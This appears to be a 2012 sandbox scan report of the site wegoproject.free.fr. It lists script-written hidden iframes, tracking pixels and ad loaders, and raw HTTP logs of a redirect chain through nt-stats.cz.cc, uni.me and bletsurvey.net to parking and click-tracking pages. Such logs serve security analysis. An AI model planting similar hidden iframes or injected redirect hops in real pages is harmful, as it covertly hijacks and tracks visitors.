<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00AAgMCAQUAAIQAiREsIwAAAAA.&cnd=%21Zh9q2giRsSAQkbymARgAIPazCjAEOPjgCEABSKkIUJjqOFgAYNgGaABwCHj4BIABGIgB-ASQAQGYAQGgAQKoAQCwAQC5AQAAAAAAAAAAwQEAAAAAAAAAAMkBS7lU0As3wz_ZAR-F61G4Huk_4AEA&udj=uf%28%27a%27%2C+40438%2C+1352402958%29%3Buf%28%27c%27%2C+530577%2C+1352402958%29%3Buf%28%27r%27%2C+2727441%2C+1352402958%29%3B&ccd=%21WwWoLQiRsSAQkbymARj2swogAQ..&vpid=46&referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html&dlo=1"></iframe>

#12 JavaScript::Write (size: 275, repeated: 1)

<iframe id="IFR_IP_170_WEB" name="IFR_IP_170_WEB" width="0" height="0" border="0" style="display:none;" src="http://backfill.ph.affinity.com/IFR_IP_WEB.html#&p=2462299&s=170&kvafseq=1&kvuniqimp=99019805cf7d4f70a346c81cf77a1a22&misc=99019805cf7d4f70a346c81cf77a1a22"></iframe>

#13 JavaScript::Write (size: 275, repeated: 1)

<iframe id="IFR_IP_170_WEB" name="IFR_IP_170_WEB" width="0" height="0" border="0" style="display:none;" src="http://backfill.ph.affinity.com/IFR_IP_WEB.html#&p=2525343&s=170&kvafseq=1&kvuniqimp=94d598502bac4b559a899e4aa10d9383&misc=94d598502bac4b559a899e4aa10d9383"></iframe>

#14 JavaScript::Write (size: 275, repeated: 1)

<iframe id="IFR_IP_225_WEB" name="IFR_IP_225_WEB" width="0" height="0" border="0" style="display:none;" src="http://backfill.ph.affinity.com/IFR_IP_WEB.html#&p=2462298&s=225&kvafseq=1&kvuniqimp=c04c256fa8714cf4a49319838fb941cb&misc=c04c256fa8714cf4a49319838fb941cb"></iframe>

#15 JavaScript::Write (size: 275, repeated: 1)

<iframe id="IFR_IP_225_WEB" name="IFR_IP_225_WEB" width="0" height="0" border="0" style="display:none;" src="http://backfill.ph.affinity.com/IFR_IP_WEB.html#&p=2525344&s=225&kvafseq=1&kvuniqimp=1ba1c8f0058f49648c0efc3680e7e9a7&misc=1ba1c8f0058f49648c0efc3680e7e9a7"></iframe>

#16 JavaScript::Write (size: 1795, repeated: 1)

<iframe id="_AF_IFR_TB_2" name="_AF_IFR_TB_2" src="http://backfill.ph.affinity.com/IFR_TB2_WEB.html#&p=2462296&s=225&arid=r3:222ffno28509c080c45ad83.35548412&purl=worddictionary.co.uk"  width="0" height="0" style="display:none"></iframe><style>.pubLogo {float:left;margin:5px 6px 0px 0px!important;}</style><!--[if IE 7 ]><style>.pubLogo {float:left;margin:5px 6px 0px 0px!important;} #pubToolbar_tc .fbIcon{margin:4px 4px 0px 0px} #pubToolbar_tc .twIcon{margin:4px 4px 0px 0px}</style><![endif]--><!--[if IE 8 ]><style>.pubLogo {float:left;margin:4px 6px 0px 0px!important;} #pubToolbar_tc .fbIcon{margin:3px 4px 0px 0px} #pubToolbar_tc .twIcon{margin:3px 4px 0px 0px}</style><![endif]--><!--[if IE 9 ]><style>.pubLogo {float:left;margin:4px 6px 0px 0px!important;} #pubToolbar_tc .fbIcon{margin:3px 4px 0px 0px} #pubToolbar_tc .twIcon{margin:3px 4px 0px 0px}</style><![endif]--><div class="footarStyle" id="shwadContainer" style="bottom: 0px; left: 0pt; margin: 0pt;"><div id="phGrp" style="width: 1600px;"><div id="shwad" style="z-index:2147483647; float: left; width: 1552px;"><div id="pubToolbar" style="z-index:2147483647; display: block; width: 1552px;"><table width="100%" cellspacing="0" cellpadding="0" border="0" class="footarSkin"><tbody><tr><td><table width="1000" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td height="31" class="pubTool_sprite" id="pubToolbar_tl" style="background:transparent url(http://s1.affinitymatrix.com/tb/v1/theme/fb_bg_sl_l.gif) no-repeat"></td><td height="31" align="right" style="background:transparent url(http://s1.affinitymatrix.com/tb/v1/theme/fb_bg_sl_c.gif) repeat-x" class="pubTool_sprite" id="pubToolbar_tc"><div style="width: 728px; height: 90px; margin: -45px 0pt 0pt -364px; z-index:2147483647; left: 50%;" id="pubToolbar_banner">

#17 JavaScript::Write (size: 139, repeated: 1)

<img src="http://ad.yieldmanager.com/cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1" width="1" height="1"/>

#18 JavaScript::Write (size: 141, repeated: 3)

<img src="http://cm.g.doubleclick.net/pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D" width="1" height="1"/>

#19 JavaScript::Write (size: 107, repeated: 1)

<img src="https://www.facebook.com/fr/u.php?p=391363987594223&m=5858721859426781856" width="1" height="1"/>

#20 JavaScript::Write (size: 263, repeated: 1)

<script language="javascript1.1" src="http://adnet.affinity.com/addyn/3.0/5359.1/2462298/0/225/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=c04c256fa8714cf4a49319838fb941cb;rdclick=;kvuniqimp=c04c256fa8714cf4a49319838fb941cb;kvafseq=1"></script>

#21 JavaScript::Write (size: 263, repeated: 1)

<script language="javascript1.1" src="http://adnet.affinity.com/addyn/3.0/5359.1/2462299/0/170/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=99019805cf7d4f70a346c81cf77a1a22;rdclick=;kvuniqimp=99019805cf7d4f70a346c81cf77a1a22;kvafseq=1"></script>

#22 JavaScript::Write (size: 263, repeated: 1)

<script language="javascript1.1" src="http://adnet.affinity.com/addyn/3.0/5359.1/2525343/0/170/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=94d598502bac4b559a899e4aa10d9383;rdclick=;kvuniqimp=94d598502bac4b559a899e4aa10d9383;kvafseq=1"></script>

#23 JavaScript::Write (size: 263, repeated: 1)

<script language="javascript1.1" src="http://adnet.affinity.com/addyn/3.0/5359.1/2525344/0/225/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=1ba1c8f0058f49648c0efc3680e7e9a7;rdclick=;kvuniqimp=1ba1c8f0058f49648c0efc3680e7e9a7;kvafseq=1"></script>

#24 JavaScript::Write (size: 197, repeated: 1)

<script language="javascript1.1" src="http://ip.ph.affinity.com/sr.js?rnd=13524029566&pid=djs28&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2"></script>

#25 JavaScript::Write (size: 198, repeated: 1)

<script language="javascript1.1" src="http://ip.ph.affinity.com/sr.js?rnd=135240295688&pid=knw79&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2"></script>

#26 JavaScript::Write (size: 198, repeated: 1)

<script language="javascript1.1" src="http://ip.ph.affinity.com/sr.js?rnd=135240295696&pid=xxz97&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2"></script>

#27 JavaScript::Write (size: 198, repeated: 1)

<script language="javascript1.1" src="http://ip.ph.affinity.com/sr.js?rnd=135240295723&pid=zsa52&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2"></script>

#28 JavaScript::Write (size: 105, repeated: 1)

<script src='http://ip.ph.affinity.com/bn.js?pid=djs28&rnd=106548815638' type='text/javascript'></script>

#29 JavaScript::Write (size: 104, repeated: 1)

<script src='http://ip.ph.affinity.com/bn.js?pid=knw79&rnd=11319507206' type='text/javascript'></script>

#30 JavaScript::Write (size: 105, repeated: 1)

<script src='http://ip.ph.affinity.com/bn.js?pid=xxz97&rnd=105649356933' type='text/javascript'></script>

#31 JavaScript::Write (size: 104, repeated: 1)

<script src='http://ip.ph.affinity.com/bn.js?pid=zsa52&rnd=97887066267' type='text/javascript'></script>

#32 JavaScript::Write (size: 197, repeated: 1)

<script src='http://tbn.ph.affinity.com/init/i.js?pubid=pqi80&aduid=150&phR=91895604245&u=http://worddictionary.co.uk/?utm_source=cb&utm_medium=cb&utm_campaign=cb2' type='text/javascript'></script>

#33 JavaScript::Write (size: 550, repeated: 1)

<script type='text/javascript' src='http://delivery.steelhousemedia.com/serve?ms=16384&cb=275834294&aid=9140&eid=27&pp=0.164858&bp=0.164858&ref=http://worddictionary.co.uk/static//inpage-affinity/knw79.html&click=http://ib.adnxs.com/click?qvI9IxEaxT9mWlE53P3CPwAAAAAAAPA_ZlpROdz9wj-q8j0jERrFP8E3HEK4geQ0oArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAA700AAgUCAQUAAIQAhiGuiwAAAAA./cnd=%21rwR_JAiJSRCEmbsBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fknw79.html/clickenc='></script>

#34 JavaScript::Write (size: 550, repeated: 1)

<script type='text/javascript' src='http://delivery.steelhousemedia.com/serve?ms=16384&cb=598335109&aid=9140&eid=27&pp=0.140831&bp=0.140831&ref=http://worddictionary.co.uk/static//inpage-affinity/zsa52.html&click=http://ib.adnxs.com/click?NKmhDcAGwj9IGKtyRjnAPwAAAAAAAPA_SBirckY5wD8zqaENwAbCP9U8wO86DuNAoArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAArTsAAgUCAQUAAIQAsR8m1gAAAAA./cnd=%21rwR_JAiJSRCEmbsBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fzsa52.html/clickenc='></script>


HTTP Transactions (109)


Request Response
GET / HTTP/1.1

Host: wegoproject.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 19:29:10 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Last-Modified: Tue, 25 Oct 2011 08:25:22 GMT
Etag: &quot;1976f7-383b-4ea67272&quot;
Connection: close
Accept-Ranges: bytes
Content-Length: 14395
GET /counter.htm HTTP/1.1

Host: nt-stats.cz.cc

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:10 GMT
Server: Apache/2.2.17 (Linux/SUSE)
X-Powered-By: PHP/5.3.5
Location: http://uni.me/404.php
Content-Length: 0
Keep-Alive: timeout=1, max=1500
Connection: Keep-Alive
GET /WEGO.png HTTP/1.1

Host: wegoproject.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 19:29:10 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Last-Modified: Sat, 27 Dec 2008 11:59:45 GMT
Etag: &quot;1977a8-788f-495618b1&quot;
Connection: close
Accept-Ranges: bytes
Content-Length: 30863
GET /404.php HTTP/1.1

Host: uni.me

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:11 GMT
Server: Apache/2.2.17 (Linux/SUSE)
X-Powered-By: PHP/5.3.5
Location: http://bletsurvey.net/d/securityvideocamera.net
Content-Length: 0
Keep-Alive: timeout=1, max=1500
Connection: Keep-Alive
GET /ajax/libs/jquery/1.5.1/jquery.min.js HTTP/1.1

Host: ajax.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Wed, 07 Nov 2012 20:35:02 GMT
Expires: Thu, 07 Nov 2013 20:35:02 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 29715
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 82449
GET /d/securityvideocamera.net HTTP/1.1

Host: bletsurvey.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Date: Thu, 08 Nov 2012 19:29:11 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
X-Powered-By: PHP/5.2.8
P3P: CP=&quot;NOI CURa OUR NOR UNI&quot;
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Location: http://bletsurvey.net/d/s4e9c07882?r=http%3A%2F%2Fwegoproject.free.fr%2F
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /d/s4e9c07882?r=http%3A%2F%2Fwegoproject.free.fr%2F HTTP/1.1

Host: bletsurvey.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Date: Thu, 08 Nov 2012 19:29:11 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: tpp_geo=Tk98Tm9yd2F5fE9zbG98T3Nsb3x8NTkuOTE2N3wxMC43NXwxMnw5MDI4fE1NNnwxOTUuMTU5; expires=Sat, 08-Dec-2012 19:29:11 GMT; path=/ tpp_4907882_l=1050%3B1352489351; expires=Sat, 10-Nov-2012 19:29:11 GMT; path=/ tpp_ov=100006%3B1352489351; expires=Sat, 10-Nov-2012 19:29:11 GMT; path=/ tpp_geo=Tk98Tm9yd2F5fDEyfE9zbG98fDU5LjkxNjd8MTAuNzV8MTJ8MHxNTTZ8MTk1LjE1OQ%3D%3D; expires=Sat, 08-Dec-2012 19:29:11 GMT; path=/ tpp_oc=100006%3B1352489351; expires=Sat, 10-Nov-2012 19:29:11 GMT; path=/
P3P: CP=&quot;NOI CURa OUR NOR UNI&quot;
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Location: http://11649.bodisparking.com/securityvideocamera.net?szcp=58
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /securityvideocamera.net?szcp=58 HTTP/1.1

Host: 11649.bodisparking.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://wegoproject.free.fr/
HTTP/1.1 200 OK

Content-Type: text/html
Last-Modified: Thu, 19 Apr 2012 04:23:41 GMT
Accept-Ranges: bytes
Etag: &quot;8044f33e41dcd1:0&quot;
Server: Microsoft-IIS/7.5
Date: Thu, 08 Nov 2012 19:29:12 GMT
Content-Length: 1233
GET /securityvideocamera.net?szcp=58 HTTP/1.1

Host: 11649.bodisparking.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://11649.bodisparking.com/securityvideocamera.net?szcp=58
If-Modified-Since: Thu, 19 Apr 2012 04:23:41 GMT
If-None-Match: &quot;8044f33e41dcd1:0&quot;
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Last-Modified: Thu, 19 Apr 2012 04:23:41 GMT
Accept-Ranges: bytes
Etag: &quot;8044f33e41dcd1:0&quot;
Server: Microsoft-IIS/7.5
Date: Thu, 08 Nov 2012 19:29:13 GMT
GET /securityvideocamera.net?szcp=58&framerequest=1&refurl=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58 HTTP/1.1

Host: 11649.bodisparking.com
GET /securityvideocamera.net?szcp=58&amp;framerequest=1&amp;refurl=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://11649.bodisparking.com/securityvideocamera.net?szcp=58
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Length: 1840
Content-Encoding: gzip
Server: Microsoft-IIS/7.5
Date: Thu, 08 Nov 2012 19:29:14 GMT
GET /favicon.ico HTTP/1.1

Host: 11649.bodisparking.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Thu, 08 Nov 2012 19:29:14 GMT
Content-Length: 1245
GET /tracking?method=ZeroClickRequest&enc=cmk9NDI1NTY0JmQ9c2VjdXJpdHl2aWRlb2NhbWVyYS5uZXQmcz1haWZwNDU5Z2p1Yzd0c3E5JnNyPSZ0YWdpZD0menBpZD0maXVmPXRydWUmdWY9MTE2NDkmc2k9NDUmc3Q9MTI0OCZ6cmk9cWFyN2h0dnF4b2Z1aXZ1bCZwaWQ9NjMmcGI9MC4wMTEwMjU&sw=1176&sh=885&r=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D HTTP/1.1

Host: 11649.bodisparking.com
GET /tracking?method=ZeroClickRequest&amp;enc=cmk9NDI1NTY0JmQ9c2VjdXJpdHl2aWRlb2NhbWVyYS5uZXQmcz1haWZwNDU5Z2p1Yzd0c3E5JnNyPSZ0YWdpZD0menBpZD0maXVmPXRydWUmdWY9MTE2NDkmc2k9NDUmc3Q9MTI0OCZ6cmk9cWFyN2h0dnF4b2Z1aXZ1bCZwaWQ9NjMmcGI9MC4wMTEwMjU&amp;sw=1176&amp;sh=885&amp;r=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://11649.bodisparking.com/securityvideocamera.net?szcp=58&amp;framerequest=1&amp;refurl=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 0
Location: http://clicks.affectsearch.com/fly?q=Security+Cameras&amp;enk=JrGGuSa5j6GPiY+pRrHGoY+JZqlGoQaRJ6lG4ybjRg==
Server: Microsoft-IIS/7.5
Date: Thu, 08 Nov 2012 19:29:14 GMT
GET /fly?q=Security+Cameras&enk=JrGGuSa5j6GPiY+pRrHGoY+JZqlGoQaRJ6lG4ybjRg== HTTP/1.1

Host: clicks.affectsearch.com
GET /fly?q=Security+Cameras&amp;enk=JrGGuSa5j6GPiY+pRrHGoY+JZqlGoQaRJ6lG4ybjRg== HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://11649.bodisparking.com/securityvideocamera.net?szcp=58&amp;framerequest=1&amp;refurl=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 19:29:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: xch1=fc96755c1ce556ccdad522c0a17abf3c; expires=Sat, 08-Dec-2012 19:29:13 GMT; path=/; domain=.affectsearch.com
Content-Length: 7932
Keep-Alive: timeout=2, max=2000
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: clicks.affectsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: xch1=fc96755c1ce556ccdad522c0a17abf3c; xch=%5Bh%3A885%5D%5Bw%3A1176%5D%5Bcd%3A24%5D%5Btz%3A60%5D%5Bjv%3Atrue%5D%5Bpg%3A8%5D%5Bmm%3A54%5D%5Bua%3AMozilla%252F5.0%2520%28Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%253B%2520rv%253A1.9.2.13%29%2520Gecko%252F20101203%2520Firefox%252F3.6.13%5D%5Bts%3A1352402954000%5D
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Thu, 08 Nov 2012 19:29:13 GMT
Server: Apache
Last-Modified: Tue, 19 Jun 2012 11:18:07 GMT
Etag: &quot;b586ab-47e-4c2d16fd499c0&quot;
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=5184000
Expires: Mon, 07 Jan 2013 19:29:13 GMT
Keep-Alive: timeout=2, max=1999
Connection: Keep-Alive
GET /fly2?sid=164717&sa=4&p=1&s=52664&qt=1352402952&q=Security+Cameras&rf=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58%26framerequest%3D1%26refurl%3Dhttp%253A%252F%252F11649.bodisparking.com%252Fsecurityvideocamera.net%253Fszcp%253D58&enc=&enk=JrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&xsc=&xsp=&xsm=&xuc=&xcf=&xai=&qxcli=ae9731b8488f0a91&qxsi=d3c561bec18df08d&mk=1&sx=1176&sy=885&bx=1176&by=778&mx=0&my=0&ifm=0&ol=cfcacc487d3b2880&tm=1352402953.44&etm=1352402953.45&cskey=zfb73&cookie_hostname=.affectsearch.com HTTP/1.1

Host: clicks.affectsearch.com
GET /fly2?sid=164717&amp;sa=4&amp;p=1&amp;s=52664&amp;qt=1352402952&amp;q=Security+Cameras&amp;rf=http%3A%2F%2F11649.bodisparking.com%2Fsecurityvideocamera.net%3Fszcp%3D58%26framerequest%3D1%26refurl%3Dhttp%253A%252F%252F11649.bodisparking.com%252Fsecurityvideocamera.net%253Fszcp%253D58&amp;enc=&amp;enk=JrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&amp;xsc=&amp;xsp=&amp;xsm=&amp;xuc=&amp;xcf=&amp;xai=&amp;qxcli=ae9731b8488f0a91&amp;qxsi=d3c561bec18df08d&amp;mk=1&amp;sx=1176&amp;sy=885&amp;bx=1176&amp;by=778&amp;mx=0&amp;my=0&amp;ifm=0&amp;ol=cfcacc487d3b2880&amp;tm=1352402953.44&amp;etm=1352402953.45&amp;cskey=zfb73&amp;cookie_hostname=.affectsearch.com HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://clicks.affectsearch.com/fly?q=Security+Cameras&amp;enk=JrGGuSa5j6GPiY+pRrHGoY+JZqlGoQaRJ6lG4ybjRg==
Cookie: xch1=fc96755c1ce556ccdad522c0a17abf3c; xch=%5Bh%3A885%5D%5Bw%3A1176%5D%5Bcd%3A24%5D%5Btz%3A60%5D%5Bjv%3Atrue%5D%5Bpg%3A8%5D%5Bmm%3A54%5D%5Bua%3AMozilla%252F5.0%2520%28Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%253B%2520rv%253A1.9.2.13%29%2520Gecko%252F20101203%2520Firefox%252F3.6.13%5D%5Bts%3A1352402954000%5D
HTTP/1.1 302 Found

Content-Type: text/html
Date: Thu, 08 Nov 2012 19:29:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-P10: 10
Location: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Content-Length: 0
Keep-Alive: timeout=2, max=2000
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: 11649.bodisparking.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Thu, 08 Nov 2012 19:29:16 GMT
Content-Length: 1245
GET /sxm.js HTTP/1.1

Host: sxtracking.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
